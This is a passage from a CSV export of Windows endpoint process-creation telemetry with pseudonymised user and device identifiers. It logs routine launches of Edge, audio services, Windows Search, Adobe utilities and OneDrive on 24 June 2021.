00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,,Microsoft Edge,91.0.864.54,PWA Identity Proxy Host,identity_helper.exe,PWA Identity Proxy Host
+491,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:25.977147+00:00,14228,SecurityHealthSystray.exe,"""SecurityHealthSystray.exe"" ",PortableExecutable,2019-12-07 09:08:41.566208100+00:00,C:\Windows\System32\SecurityHealthSystray.exe,86016,783c99afd4c2ae6950fa5694389d2cfa,570b37a7a3ffdafcceccc33cbc1968feb857b73ca3cb4dffedc2e67e9abd0878,d79d21f4d6741f83fb98fdcf8d06fe8c5d78a799,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:26.051379400+00:00,2021-06-24 00:53:50.921397600+00:00,4e7f3fe5-9852-4b4a-a64a-912238df57fc,computerpii_0a470890c60768167990033d701e7bd881398861,168132,False,10.7740.19041.1052,False,11540474045175127,,11540474045175192,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,18420,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1,SecurityHealthSystray,SecurityHealthSystray.exe,Windows Security notification icon
+492,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:26.664671700+00:00,15408,msedge.exe,"""msedge.exe"" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6712 /prefetch:8",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:26.748376300+00:00,2021-06-24 00:53:50.922016700+00:00,bf7ef7f3-92d6-4b60-8af8-709c0100fb9b,computerpii_0a470890c60768167990033d701e7bd881398861,168144,False,10.7740.19041.1052,False,11540474045175158,,11540474045175195,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,18560,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,,384.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+493,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:26.886648700+00:00,3516,RtkAudUService64.exe,"""RtkAudUService64.exe"" -background",PortableExecutable,2021-06-11 09:11:41.196395400+00:00,C:\Windows\System32\DriverStore\FileRepository\realtekservice.inf_amd64_f31d3fd59f245137\RtkAudUService64.exe,1256824,2805aa081ca8451e6d459d246c15bce9,9e659b1f529bed5111714ec4bb4cf3c055e69240438eee7b6e88226ba3146407,0efd918c6e662d4a43c13ef133eadd4ce0ae9061,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:26.901546400+00:00,2021-06-24 00:53:50.922283300+00:00,f04af0c2-6eaa-4d31-8dfa-434d85bdca69,computerpii_0a470890c60768167990033d701e7bd881398861,168149,False,10.7740.19041.1052,False,11540474045175127,,11540474045175197,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,18420,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Realtek Semiconductor,Realtek HD Audio Universal Service,1.0.370.2,RtkAudUService.exe,RtkAudUService.exe,Realtek HD Audio Universal Service
+494,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:27.629899700+00:00,17000,WavesSvc64.exe,"""WavesSvc64.exe"" -Jack",PortableExecutable,2020-12-23 12:23:08+00:00,C:\Windows\System32\DriverStore\FileRepository\wavesapo9de.inf_amd64_177ab60f8bad72cc\WavesSvc64.exe,1776744,b91de64b9ff3cd6294fdb7b21972bc88,c1c36b61ad681091c2aa778d37b14afc52b9052698710c00fd8b1fecc73d0d30,bc540af17e33b3fbbd6573bbf6d0e5cd88b05b04,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:27.706187600+00:00,2021-06-24 00:53:50.923188700+00:00,f28a2c4b-c356-4db9-b9eb-b85e327d5626,computerpii_0a470890c60768167990033d701e7bd881398861,168167,False,10.7740.19041.1052,False,11540474045175127,,11540474045175201,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,18420,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,1.0,1.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Waves Audio Ltd.,Waves MaxxAudio,1.42.18.0,WavesSvc.exe,WavesSvc.exe,Waves MaxxAudio Service Application
+495,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:29.831071400+00:00,2472,SettingSyncHost.exe,SettingSyncHost.exe -Embedding,PortableExecutable,2021-02-17 04:35:15.621915800+00:00,C:\Windows\System32\SettingSyncHost.exe,968528,e60933f971f523d62331bc69b79f00b3,321656887526b439967b377c20c3ae04f48b11a77eea11f7febe47d30b3f7bc7,aaef92361eedd41aea3698c96b6fc386cb8a8a69,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:29.992592100+00:00,2021-06-24 00:53:50.925012200+00:00,06606642-03b8-434f-871d-f2deace24596,computerpii_0a470890c60768167990033d701e7bd881398861,168209,False,10.7740.19041.1052,False,11540474045136908,,11540474045175204,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,SettingSyncHost,SettingSyncHost.exe,Host Process for Setting Synchronization
+496,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:31.545625400+00:00,8936,SearchProtocolHost.exe,"""SearchProtocolHost.exe"" Global\UsGthrFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320740_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-12-1-3476864874-1154527411-4288707492-1560701320740 1 -2147483646 ""Software\Microsoft\Windows Search"" ""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)"" ""C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc"" ""DownLevelDaemon""  ""1""",PortableExecutable,2021-06-09 01:20:40.707822200+00:00,C:\Windows\System32\SearchProtocolHost.exe,419328,98ffd56887c1511e98a5542531829025,62d8455ee452be6aa6164426e43f2f1461858dd305a3e784dbd01e32691f30dc,e3228222bbeca59a928647c66c4162d1e33ae4a4,3effdb0c80e124422002c4c9ab44260b,e1bd5d2944c4ddfe7cbf6a5a14d8f06a35598a02a5ad824304f0b7936c410d7f,d3820e98b7a6f63507e21173ccdfe385bc956b65,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-12 08:58:16.041470900+00:00,4660,SearchIndexer.exe,SearchIndexer.exe /Embedding,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:31.708605300+00:00,2021-06-24 00:53:50.925899900+00:00,8f5972c7-e5f8-45e9-8b59-f3f089f7911a,computerpii_0a470890c60768167990033d701e7bd881398861,168225,False,10.7740.19041.1052,False,11540474045144190,,11540474045175209,2021-06-12 08:58:16.041470900+00:00,4660,2021-06-12 08:58:16.041470900+00:00,\Device\HarddiskVolume3\Windows\System32\SearchIndexer.exe,4660,128,ActiveProcessStartkey,C:\Windows\System32,935424,2033-01-12 07:23:33+00:00,2021-06-09 01:20:40.758122300+00:00,2021-06-12 08:58:09.260084800+00:00,2021-06-09 01:20:40.738030500+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchIndexer.exe,SearchIndexer.exe,Microsoft Windows Search Indexer,Microsoft Corporation,Windows® Search,7.0.19041.1023,SearchProtocolHost.exe,SearchProtocolHost.exe,Microsoft Windows Search Protocol Host
+497,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:31.647418500+00:00,9972,AGCInvokerUtility.exe,"""AGCInvokerUtility.exe"" ",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe,3412680,f7c8ef9fd17e2c89dc2770cca8db6242,eb8faf481eeafb6be3c1254b81a800f2c74fa7d8ab682cab5409bef44251b60f,696a27e0a254ea3c0b14368bfc5d7b4997d20711,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:31.815284300+00:00,2021-06-24 00:53:50.925990400+00:00,1716c9f0-5677-4e11-9830-b11f32f9af27,computerpii_0a470890c60768167990033d701e7bd881398861,168227,False,10.7740.19041.1052,False,11540474045175127,,11540474045175210,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,18420,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,1.0,1.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,"Adobe Systems, Incorporated",GC Invoker Utility,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AGCInvokerUtility.exe,AGCInvokerUtility.exe,Adobe GC Invoker Utility
+498,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:32.659767100+00:00,13504,updaterstartuputility.exe,"""updaterstartuputility.exe"" ",PortableExecutable,2018-04-10 16:54:48+00:00,C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\updaterstartuputility.exe,509936,35641379d8f16bf3d6024191261aa6ef,8566f0549fb35261dbda9f526ef86320bb3723c31de075af3882b21be15e1091,f37066e755372a85d9912e2c87258c3f3798f666,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:32.728798500+00:00,2021-06-24 00:53:50.926763400+00:00,46c893bb-452d-44e6-8001-8ac21d6ef950,computerpii_0a470890c60768167990033d701e7bd881398861,168244,False,10.7740.19041.1052,False,11540474045175127,,11540474045175211,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,18420,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,1.0,1.0,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows Explorer,Adobe Systems Incorporated,Adobe Updater Startup Utility,9.0.0.31 (BuildVersion: 1.0; BuildDate: BUILDDATETIME),updaterstartuputility.exe,UpdateInstaller.exe,Adobe Updater Startup Utility
+499,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:33.061775400+00:00,9460,AdobeGCClient.exe,"""AdobeGCClient.exe"" --xmlFilePath=""C:\Users\UserPII_645f5cd0404c4e1e192b246101c6588b1cef1c74\AppData\Local\Temp\adobegc_a10532"" --workflowInitiator=GCInvokerUtility --xmlFilePath2=""C:\Users\UserPII_61c9b2b17db77a27841bbeeabff923448b0f6388\Documents\AdobeGC\adobegc_a10532""",PortableExecutable,2020-09-22 19:30:00+00:00,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AdobeGCClient.exe,6743752,99b696fe03a14bd322f39fc35827e487,b57aab0a87e6c85ddf061a0a10bc10b96c61ae827fbb61f514a1df9fffcf263f,43d2475f42eeacb434b632975a33ebc8979a95b3,f7c8ef9fd17e2c89dc2770cca8db6242,eb8faf481eeafb6be3c1254b81a800f2c74fa7d8ab682cab5409bef44251b60f,696a27e0a254ea3c0b14368bfc5d7b4997d20711,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:31.647418500+00:00,9972,AGCInvokerUtility.exe,"""AGCInvokerUtility.exe"" ",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:33.317158300+00:00,2021-06-24 00:53:50.927068500+00:00,45b062ea-2572-412d-9ba5-c26233f94d70,computerpii_0a470890c60768167990033d701e7bd881398861,168250,False,10.7740.19041.1052,False,11540474045175210,,11540474045175212,2021-06-24 00:52:31.647418500+00:00,9972,2021-06-24 00:52:31.647418500+00:00,\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe,9972,128,TerminateProcessStartkey,C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient,3412680,2021-02-17 03:27:55+00:00,2021-02-16 19:38:26+00:00,2021-06-24 00:52:31.693375+00:00,2020-09-22 19:30:00+00:00,2176,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1.0,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,"Adobe Systems, Incorporated",GC Invoker Utility,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AGCInvokerUtility.exe,AGCInvokerUtility.exe,Adobe GC Invoker Utility,"Adobe Systems, Incorporated",AdobeGCClient,7.3.0.157 BuildVersion: 7.3; BuildDate: Wed Feb 17 2021 03:10:19,AdobeGCClient,AdobeGCClient.exe,Adobe GC Client Application
+500,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:52:33.153504800+00:00,15588,OneDrive.exe,"""OneDrive.exe"" /background",PortableExecutable,2020-11-11 01:00:55.217759900+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\OneDrive\OneDrive.exe,1972608,11ba11877c91ca6e9d705f4de1f68fe6,7270e71d3dfeef57e322931c341a83328474e0f543fb5aec66fce9b8ae90ed1f,fb9ca96631c86fd40768d63831cc327431e04a64,4bf8cf1a2379b0054860ec220ca329b9,63f8608b5eb6ba2d37fffaf46f86363faf15684a367c1603ceb06f0693c877ba,e94fc38810c097a64f7419960f2d21052d1cb2e7,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:13.094577200+00:00,18420,explorer.exe,Explorer.EXE,False,2021-06-24 00:52:12.833640100+00:00,13428,\Device\HarddiskVolume3\Windows\System32\userinit.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:52:33.348778300+00:00,2021-06-24 00:53:50.927174+00:00,edd0aaf2-0bce-45ed-b9cc-eabd7fd9a6f3,computerpii_0a470890c60768167990033d701e7bd881398861,168252,False,10.7740.19041.1052,False,11540474045175127,,11540474045175213,2021-06-24 00:52:13.094577200+00:00,18420,2021-06-24 00:52:13.094577200+00:00,\Device\HarddiskVolume3\Windows\explorer.exe,18420,128,ActiveProcessStartkey,C:\Windows,4891752,2074-04-27 14:38:40+00:00,2021-06-09 01:20:37.481306100+00:00,2021-06-24 00:52:13.096789600+00:00,2021-06-09 01:20:37.358875500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,20481.0,1.0,1.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,explorer,EXPLORER.EXE,Windows 